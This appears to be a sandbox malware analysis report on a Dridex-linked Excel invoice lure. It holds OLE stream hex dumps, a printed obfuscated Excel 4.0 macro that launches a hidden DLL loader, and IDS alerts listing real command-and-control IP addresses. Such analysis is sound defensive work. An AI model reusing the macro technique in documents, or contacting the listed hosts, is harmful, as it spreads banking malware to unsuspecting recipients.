                                                                                                Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2485
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_0
                                                                                                File Type:data
                                                                                                Stream Size:2485
                                                                                                Entropy:3.44397799521
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . y . . . . . ` L . o . . * . % .
                                                                                                Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 03 00 00 00 00 00 01 00 02 00 03 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00
                                                                                                Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 337
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_1
                                                                                                File Type:data
                                                                                                Stream Size:337
                                                                                                Entropy:2.58977777762
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p C a l l e r . . . . . . . . . . . . . . . . s z U R L . . . . . . . . . . . . . . . . s z F i l e N a m e . . . . . . . . . . . . . . . . d w R e s e r v e d . . . . . . . . . . . . . . . . l p f n C B . . . . . . . .
                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff
                                                                                                Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 505
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_2
                                                                                                File Type:data
                                                                                                Stream Size:505
                                                                                                Entropy:2.40466111917
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . $ . . . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Z . . .
                                                                                                Data Raw:72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 682
                                                                                                General
                                                                                                Stream Path:VBA/__SRP_3
                                                                                                File Type:data
                                                                                                Stream Size:682
                                                                                                Entropy:2.22119402301
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h . . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . .
                                                                                                Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 68 00 e1 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 70 14 00 fe ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                Stream Path: VBA/dir, File Type: SVR2 pure executable (USS/370) not stripped - version 8520192, Stream Size: 860
                                                                                                General
                                                                                                Stream Path:VBA/dir
                                                                                                File Type:SVR2 pure executable (USS/370) not stripped - version 8520192
                                                                                                Stream Size:860
                                                                                                Entropy:6.57150861586
                                                                                                Base64 Encoded:True
                                                                                                Data ASCII:. X . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . . . . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
                                                                                                Data Raw:01 58 b3 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 91 bc f8 61 04 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                                                                Macro 4.0 Code

                                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)

                                                                                                ,"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",uveoybvk.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

                                                                                                OLE File "/opt/package/joesandbox/database/analysis/342716/sample/1_Total New Invoices-Thursday January 21_2021.xlsm"

                                                                                                Indicators

                                                                                                Has Summary Info:False
                                                                                                Application Name:unknown
                                                                                                Encrypted Document:False
                                                                                                Contains Word Document Stream:
                                                                                                Contains Workbook/Book Stream:
                                                                                                Contains PowerPoint Document Stream:
                                                                                                Contains Visio Document Stream:
                                                                                                Contains ObjectPool Stream:
                                                                                                Flash Objects Count:
                                                                                                Contains VBA Macros:False

                                                                                                Summary

                                                                                                Subject:by C.H. Robinson
                                                                                                Author:
                                                                                                Last Saved By:
                                                                                                Create Time:2021-01-21T13:13:53Z
                                                                                                Last Saved Time:2021-01-21T13:20:42Z
                                                                                                Security:0

                                                                                                Document Summary

                                                                                                Thumbnail Scaling Desired:false
                                                                                                Company:
                                                                                                Contains Dirty Links:false
                                                                                                Shared Document:false
                                                                                                Changed Hyperlinks:false
                                                                                                Application Version:16.0300

                                                                                                Streams

                                                                                                Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                                                                General
                                                                                                Stream Path:\x1CompObj
                                                                                                File Type:data
                                                                                                Stream Size:115
                                                                                                Entropy:4.80096587863
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . . . . . . . . . . . p . . F z ? . . . . . . . a . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . M u l t i P a g e . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 70 13 e3 46 7a 3f ce 11 be d6 00 aa 00 61 10 80 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 12 00 00 00 46 6f 72 6d 73 2e 4d 75 6c 74 69 50 61 67 65 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Stream Path: f, File Type: data, Stream Size: 178
                                                                                                General
                                                                                                Stream Path:f
                                                                                                File Type:data
                                                                                                Stream Size:178
                                                                                                Entropy:2.99997300614
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . $ . H . . . . . . . . @ . . . . . . . } . . . . . . . . . . . . . . . . . . . . . . . . t . . . . . . i . . . . . . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . . . . . . . # . . . . . . . P a g e 1 a b 4 5 . . . 5 . . . . . $ . . . . . . . . . . . . . ! . . . . . . . P a g e 2 a b 4 5 . . . . . . . . . . . . . . . T . . .
                                                                                                Data Raw:00 04 24 00 48 0c 00 0c 03 00 00 00 04 40 00 00 04 00 00 00 00 7d 00 00 d8 13 00 00 e2 0e 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 74 00 00 00 00 83 01 69 00 00 1c 00 f4 01 00 00 01 00 00 00 32 00 00 00 98 00 00 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 24 00 d5 01 00 00 05 00 00 80 02 00 00 00 23 00 04 00 01 00 07 00 50 61 67 65 31 61 62 34 35 00 00 00 35 00 00 00 00 00
                                                                                                Stream Path: i02/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                General
                                                                                                Stream Path:i02/\x1CompObj
                                                                                                File Type:data
                                                                                                Stream Size:110
                                                                                                Entropy:4.63372611993
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Stream Path: i02/f, File Type: data, Stream Size: 40
                                                                                                General
                                                                                                Stream Path:i02/f
                                                                                                File Type:data
                                                                                                Stream Size:40
                                                                                                Entropy:1.90677964945
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . . . @ . . . . . . . . } . . n . . . x . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 78 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Stream Path: i02/o, File Type: empty, Stream Size: 0
                                                                                                General
                                                                                                Stream Path:i02/o
                                                                                                File Type:empty
                                                                                                Stream Size:0
                                                                                                Entropy:0.0
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:
                                                                                                Data Raw:
                                                                                                Stream Path: i03/\x1CompObj, File Type: data, Stream Size: 110
                                                                                                General
                                                                                                Stream Path:i03/\x1CompObj
                                                                                                File Type:data
                                                                                                Stream Size:110
                                                                                                Entropy:4.63372611993
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . . . . . . . . . . . . i * . . . . . . . . . . W J O . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . F o r m s . F o r m . 1 . . 9 . q . . . . . . . . . . . .
                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff f0 69 2a c6 dc 16 ce 11 9e 98 00 aa 00 57 4a 4f 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 0d 00 00 00 46 6f 72 6d 73 2e 46 6f 72 6d 2e 31 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Stream Path: i03/f, File Type: data, Stream Size: 40
                                                                                                General
                                                                                                Stream Path:i03/f
                                                                                                File Type:data
                                                                                                Stream Size:40
                                                                                                Entropy:1.90677964945
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . . . @ . . . . . . . . } . . n . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:00 04 1c 00 40 0c 00 08 04 80 00 00 00 7d 00 00 6e 13 00 00 fd 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                Stream Path: i03/o, File Type: empty, Stream Size: 0
                                                                                                General
                                                                                                Stream Path:i03/o
                                                                                                File Type:empty
                                                                                                Stream Size:0
                                                                                                Entropy:0.0
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:
                                                                                                Data Raw:
                                                                                                Stream Path: o, File Type: data, Stream Size: 152
                                                                                                General
                                                                                                Stream Path:o
                                                                                                File Type:data
                                                                                                Stream Size:152
                                                                                                Entropy:3.07931127615
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . p . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P a g e 1 . . 9 . . . . P a g e 2 . . 9 . . . . . . . . . . . . T a b 3 . . . . T a b 4 . . . . . . . . . . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i . . . . . . . . .
                                                                                                Data Raw:00 02 70 00 31 82 fa 00 00 00 00 00 18 00 00 00 02 00 00 00 08 00 00 00 10 00 00 00 04 00 00 00 08 00 00 00 02 00 00 00 08 00 00 00 d8 13 00 00 e2 0e 00 00 05 00 00 80 50 61 67 65 31 da 1c 39 05 00 00 80 50 61 67 65 32 da 1c 39 00 00 00 00 00 00 00 00 04 00 00 80 54 61 62 33 04 00 00 80 54 61 62 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80
                                                                                                Stream Path: x, File Type: data, Stream Size: 48
                                                                                                General
                                                                                                Stream Path:x
                                                                                                File Type:data
                                                                                                Stream Size:48
                                                                                                Entropy:1.42267983198
                                                                                                Base64 Encoded:False
                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                Data Raw:00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 04 00 00 00 00 00 00 02 0c 00 06 00 00 00 02 00 00 00 01 00 00 00 02 00 00 00 03 00 00 00

                                                                                                Macro 4.0 Code

                                                                                                CALL(wegb&o0, "S"&ohgdfww&"A", i0&i0&"CCCC"&i0, 0, v0&"p"&w00&"n", "r"&w00&"gsvr"&o0, " -s "&bb&ab, 0, 0)

                                                                                                ,"=CALL(wegb&o0,""S""&ohgdfww&""A"",i0&i0&""CCCC""&i0,0,v0&""p""&w00&""n"",""r""&w00&""gsvr""&o0,"" -s ""&bb&ab,0,0)",uveoybvk.dll,,,,,,,,,,,,,,,,,,,,,,,,,,=RETURN(),

                                                                                                Network Behavior

                                                                                                Snort IDS Alerts

                                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                01/21/21-16:03:27.533313ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                01/21/21-16:04:10.528618TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349170194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:12.499655TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349171211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:16.182279TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649173198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:16.182279TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649173198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:17.732097TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349174194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:19.577174TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349175211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:20.449372TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349176194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:22.405299TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349178211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:22.977932TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649179198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:22.977932TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649179198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:24.326739TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349181194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:25.673798TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349182211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:25.916031TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649183198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:25.916031TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649183198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:27.251133TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349185194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:28.586947TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349187211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:29.150739TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649188198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:29.150739TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649188198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:30.556130TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349190194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:31.872034TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649193198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:31.872034TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649193198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:31.898933TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349192211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:33.298173TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349194194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:34.701529TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349196211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:35.844382TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649197198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:35.844382TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649197198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:39.180341TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349198194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:40.621421TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349200211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:40.785185TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649201198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:40.785185TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649201198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:43.371398TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349202194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:44.842753TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349204211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:45.524251TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649205198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:45.524251TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649205198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:46.921906TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349206194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:48.312954TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349207211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:50.163233TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649209198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:50.163233TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649209198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:51.614740TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349211194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:51.985596TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649212198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:51.985596TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649212198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:53.014734TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349213211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:53.908263TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349214194.225.58.214192.168.2.22
                                                                                                01/21/21-16:04:55.342083TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349215211.110.44.63192.168.2.22
                                                                                                01/21/21-16:04:58.578879TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649218198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:58.578879TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649218198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:59.792435TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649219198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:59.792435TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649219198.57.200.100192.168.2.22
                                                                                                01/21/21-16:04:59.962903TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349220194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:01.242080TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349222194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:01.339167TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349221211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:02.950427TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349223211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:05.102027TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649226198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:05.102027TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649226198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:06.362416TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649227198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:06.362416TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649227198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:06.848613TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349228194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:07.794094TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349229194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:08.272927TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349230211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:09.236162TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349231211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:11.803955TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649234198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:11.803955TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649234198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:13.080928TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349235194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:13.163277TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349237194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:13.267179TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649236198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:13.267179TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649236198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:14.514401TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349238211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:14.613041TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)44349239194.225.58.214192.168.2.22
                                                                                                01/21/21-16:05:15.360047TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349240211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:15.965007TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349241211.110.44.63192.168.2.22
                                                                                                01/21/21-16:05:17.760588TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649244198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:17.760588TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649244198.57.200.100192.168.2.22
                                                                                                01/21/21-16:05:18.964732TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649246198.57.200.100192.168.2.22
